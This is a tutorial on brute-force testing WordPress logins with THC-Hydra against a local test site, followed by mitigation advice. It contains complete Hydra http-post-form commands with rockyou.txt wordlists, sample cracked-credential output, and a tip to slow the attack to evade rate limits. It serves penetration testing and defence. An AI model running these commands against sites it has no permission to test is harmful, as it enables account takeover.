Table of Contents#
- What is a Brute Force Attack?
- Why WordPress is Vulnerable to Brute Force Attacks
- What is Hydra?
- Prerequisites for Testing
- Step-by-Step Guide to Brute Force Testing with Hydra
- Mitigation Strategies to Prevent Brute Force Attacks
- Troubleshooting Common Hydra Issues
- Conclusion
- References
1. What is a Brute Force Attack?#
A brute force attack is a trial-and-error method where an attacker systematically attempts every possible combination of usernames and passwords until they find the correct one. Unlike more sophisticated attacks (e.g., SQL injection), brute force relies on raw computing power and time. For WordPress sites, attackers often target the /wp-login.php page, as it’s the primary entry point for admin access.
Brute force attacks are effective against weak passwords (e.g., "password123", "admin") or default credentials (e.g., username "admin"). Even strong passwords can be cracked with enough time and resources, though modern security measures significantly raise the bar.
2. Why WordPress is Vulnerable to Brute Force Attacks#
WordPress’s popularity makes it a high-value target. Several factors increase its risk:
- Default Credentials: Many users retain the default "admin" username, making it easier for attackers to guess.
- Weak Passwords: Users often use simple, memorable passwords (e.g., "123456", "qwerty").
- Lack of Login Limits: By default, WordPress does not restrict the number of failed login attempts, allowing attackers to try unlimited combinations.
- Public Login Page: The
/wp-login.phpendpoint is publicly accessible, making it easy for attackers to target.
3. What is Hydra?#
Hydra (short for "THC-Hydra") is a popular open-source password-cracking tool developed by the THC (The Hacker’s Choice) team. It supports multiple protocols (HTTP, FTP, SSH, SMTP, etc.) and is designed for parallelized brute force attacks, meaning it can test thousands of credentials simultaneously.
Key features of Hydra:
- Supports 50+ protocols (including HTTP POST, which is critical for WordPress).
- Customizable attack speed (adjustable threads).
- Ability to use wordlists for usernames and passwords.
- Cross-platform (Linux, Windows, macOS).
4. Prerequisites for Testing#
Before using Hydra to test a WordPress site, ensure you meet these requirements:
4.1 Ethical and Legal Considerations#
Critical: You must have explicit permission to test the target WordPress site. Unauthorized brute force testing is illegal in most jurisdictions (violates laws like the Computer Fraud and Abuse Act in the U.S.) and unethical. Use Hydra only on your own sites or sites you own/operate.
4.2 Tools and Setup#
- Kali Linux: Hydra is pre-installed on Kali Linux (a penetration-testing distribution). If you use another OS, install Hydra via:
- Ubuntu/Debian:
sudo apt install hydra - macOS:
brew install hydra
- Ubuntu/Debian:
- WordPress Test Site: Use a local or staging WordPress site (not production!) for testing. Tools like XAMPP or Local by Flywheel can set up a local WordPress environment.
- Wordlist Files: Hydra requires lists of potential usernames and passwords. Kali Linux includes prebuilt wordlists in
/usr/share/wordlists/(e.g.,rockyou.txt, a popular list of 14 million+ common passwords). - Basic Command-Line Knowledge: You’ll need to run Hydra via the terminal, so familiarity with Linux commands (e.g.,
cd,ls) is helpful.
5. Step-by-Step Guide to Brute Force Testing with Hydra#
Let’s walk through testing a WordPress site with Hydra. We’ll use a local test site (http://localhost/wp-test) for demonstration.
5.1 Identify the WordPress Login Endpoint#
First, confirm the login URL. For most WordPress sites, this is http://<target>/wp-login.php (e.g., http://localhost/wp-test/wp-login.php).
Verify the endpoint by visiting it in a browser—you should see the WordPress login form.
5.2 Capture the Login Request (POST Data)#
To brute force WordPress, we need to mimic the HTTP POST request sent when a user submits the login form. This includes:
- The URL (
/wp-login.php). - POST parameters (username, password, submit button, etc.).
- Indicators of success/failure (e.g., a redirect on success or an error message on failure).
How to Capture the Request:#
Use your browser’s Developer Tools (F12 in Chrome/Firefox) or a proxy tool like Burp Suite. Here’s how with Chrome:
- Go to
http://localhost/wp-test/wp-login.php. - Open Developer Tools → Network tab.
- Enter dummy credentials (e.g., username: "test", password: "test") and click "Log In".
- In the Network tab, find the request to
wp-login.php(filter by "Doc" or "POST"). - Click the request → Payload tab to view POST data.
You’ll see parameters like:
log=test&pwd=test&wp-submit=Log+In&redirect_to=http%3A%2F%2Flocalhost%2Fwp-test%2Fwp-admin%2F&testcookie=1
Key parameters:
log: The username field (variable:^USER^in Hydra).pwd: The password field (variable:^PWD^in Hydra).wp-submit=Log+In: The submit button (static value).redirect_to: URL to redirect on success (static value).
5.3 Prepare Wordlists#
Hydra uses separate wordlists for usernames (-L flag) and passwords (-P flag).
Username List (userlist.txt):#
Create a simple list of potential usernames (e.g., admin, editor, testuser):
admin
editor
testuser Password List:#
Use Kali’s rockyou.txt (unzip first with sudo gunzip /usr/share/wordlists/rockyou.txt.gz), or create a custom list (passlist.txt) with weak passwords:
password
123456
qwerty
admin123
letmein 5.4 Construct the Hydra Command#
Hydra’s syntax for HTTP POST brute force is:
hydra -L <userlist> -P <passlist> <target> http-post-form "<login-path>:<post-data>:<success-indicator>" Breakdown of Parameters:#
-L <userlist>: Path to the username wordlist (e.g.,userlist.txt).-P <passlist>: Path to the password wordlist (e.g.,passlist.txt).<target>: IP address or domain of the WordPress site (e.g.,localhostor192.168.1.100).http-post-form: Hydra module for HTTP POST requests.<login-path>: The login endpoint (e.g.,/wp-test/wp-login.php).<post-data>: POST parameters with^USER^(replaced with usernames) and^PWD^(replaced with passwords).<success-indicator>: A string/condition indicating a successful login (e.g., "Location: wp-admin" for redirects, or "Invalid" for failure).
5.5 Run the Attack and Interpret Results#
Example 1: Basic Brute Force Command#
hydra -L userlist.txt -P passlist.txt localhost http-post-form "/wp-test/wp-login.php:log=^USER^&pwd=^PWD^&wp-submit=Log+In&redirect_to=http%3A%2F%2Flocalhost%2Fwp-test%2Fwp-admin%2F&testcookie=1:S=Location: wp-admin" -v -v: Verbose mode (shows progress).S=Location: wp-admin: Success indicator (Hydra looks for "Location: wp-admin" in the response headers, which WordPress sends on successful login).
Example 2: Use rockyou.txt for Passwords#
hydra -L userlist.txt -P /usr/share/wordlists/rockyou.txt localhost http-post-form "/wp-test/wp-login.php:log=^USER^&pwd=^PWD^&wp-submit=Log+In&redirect_to=http%3A%2F%2Flocalhost%2Fwp-test%2Fwp-admin%2F&testcookie=1:F=Invalid username" -t 4 -V -t 4: Use 4 threads (adjust based on your system; too many may trigger rate limits).-V: Extra verbose (shows each attempt).F=Invalid username: Failure indicator (Hydra continues if "Invalid username" is in the response).
Interpreting Results#
If Hydra finds valid credentials, it will output:
[STATUS] attack finished for localhost (waiting for children to complete tests)
[80][http-post-form] host: localhost login: admin password: letmein
1 of 1 target successfully completed, 1 valid password found
This means the username "admin" and password "letmein" worked.
6. Mitigation Strategies to Prevent Brute Force Attacks#
Once you’ve tested for vulnerabilities, secure your site with these measures:
1. Enforce Strong Passwords#
- Use passwords with 12+ characters, including uppercase, lowercase, numbers, and symbols (e.g.,
P@ssw0rd!2024). - Avoid common words, names, or dates. Tools like Password Generator can create strong passwords.
2. Limit Login Attempts#
Use WordPress plugins to block repeated failed logins:
- Wordfence Security (free tier includes login limiting).
- Limit Login Attempts Reloaded.
3. Enable Two-Factor Authentication (2FA)#
Add a second layer of security with 2FA plugins:
4. Change the Default "admin" Username#
Attackers often target "admin" as the username. Create a unique admin username during WordPress setup or use a plugin like Username Changer.
5. Use a Web Application Firewall (WAF)#
A WAF (e.g., Cloudflare, Sucuri) can block brute force attacks by:
- Rate-limiting requests to
/wp-login.php. - Flagging suspicious IP addresses.
6. Disable XML-RPC (If Unused)#
XML-RPC (/xmlrpc.php) is used for remote publishing but can be exploited for brute force attacks. Disable it via:
- Plugins like Disable XML-RPC.
- Adding
add_filter('xmlrpc_enabled', '__return_false');towp-config.php.
7. Troubleshooting Common Hydra Issues#
Issue: Hydra Fails Due to Dynamic Nonces#
WordPress sometimes includes a nonce (a temporary security token) in the login form to prevent CSRF attacks. Hydra cannot handle dynamic nonces by default, causing failed attempts.
Fix:
- Check if the nonce is static (unlikely). If so, include it in the POST data.
- Use tools like Burp Intruder (which can handle dynamic tokens) as an alternative.
Issue: Rate Limiting Blocks Hydra#
If your test site has login limits (e.g., via Wordfence), Hydra may get blocked mid-attack.
Fix:
- Temporarily disable login limits on your test site.
- Reduce Hydra’s thread count (
-t) to slow the attack.
Issue: Incorrect POST Parameters#
If Hydra returns "0 valid passwords found" even with known credentials, check the POST data for typos (e.g., missing wp-submit=Log+In or incorrect redirect_to URL).
Fix: Re-capture the login request with Developer Tools to verify parameters.
8. Conclusion#
Brute force attacks pose a significant risk to WordPress sites, but with tools like Hydra, you can proactively test your defenses. By following this guide, you’ve learned to simulate attacks, identify weak points, and implement critical security measures (strong passwords, 2FA, login limits).
Remember: always test ethically—only target sites you own or have explicit permission to test. With the right tools and practices, you can keep your WordPress site secure against brute force threats.